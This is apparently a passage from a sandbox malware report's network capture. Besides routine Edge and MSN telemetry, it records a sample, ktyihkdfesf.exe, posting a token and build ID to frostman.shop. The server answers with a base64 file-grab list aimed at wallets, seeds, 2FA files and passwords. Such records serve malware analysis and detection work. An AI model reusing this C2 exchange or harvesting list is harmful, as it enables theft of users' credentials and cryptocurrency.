                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                54192.168.2.64996120.110.205.1194432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC1261OUTGET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&MUID=015EFEE8056263FB2030EBB304006296 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=015EFEE8056263FB2030EBB304006296; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:51 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=015EFEE8056263FB2030EBB304006296; domain=c.msn.com; expires=Wed, 14-Jan-2026 06:31:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:31:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 20-Dec-2024 06:41:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 42
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                55192.168.2.64996020.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 33 52 36 6c 6e 49 5a 6c 6b 61 34 49 6d 31 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 34 35 33 36 64 37 61 64 66 35 65 37 62 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: a3R6lnIZlka4Im15.1Context: cf4536d7adf5e7bc
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 33 52 36 6c 6e 49 5a 6c 6b 61 34 49 6d 31 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 34 35 33 36 64 37 61 64 66 35 65 37 62 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: a3R6lnIZlka4Im15.2Context: cf4536d7adf5e7bc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 61 33 52 36 6c 6e 49 5a 6c 6b 61 34 49 6d 31 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 34 35 33 36 64 37 61 64 66 35 65 37 62 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: a3R6lnIZlka4Im15.3Context: cf4536d7adf5e7bc
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 63 56 59 58 43 62 33 48 45 53 47 41 5a 6f 64 37 74 53 4e 51 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: hcVYXCb3HESGAZod7tSNQw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                56192.168.2.649972116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----OZUKFK6PZ58YM7QQ1V3O
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------OZUKFK6PZ58YM7QQ1V3OCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:53 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:53 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                                Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                57192.168.2.649981116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----VA16PHVSJEKNYMGDTRIE
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:54 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------VA16PHVSJEKNYMGDTRIECont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                58192.168.2.64998652.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313254&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 11917
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC11917OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 33 2e 32 35 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:53.251Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=3e4f717514fa493db7b26ff64e6eaa19&HASH=3e4f&LV=202412&V=4&LU=1734676315786; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=5e4d79f72d774e93aab09bd169cbb71d; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2532
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                59192.168.2.64998752.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313257&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 5171
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC5171OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 33 2e 32 35 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:53.257Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=648aa7eeaac1460a955c3286febc5fea&HASH=648a&LV=202412&V=4&LU=1734676315775; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=053a2ac4d10f4fd2bdf96cf1cef1ea89; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2518
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                60192.168.2.64998952.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
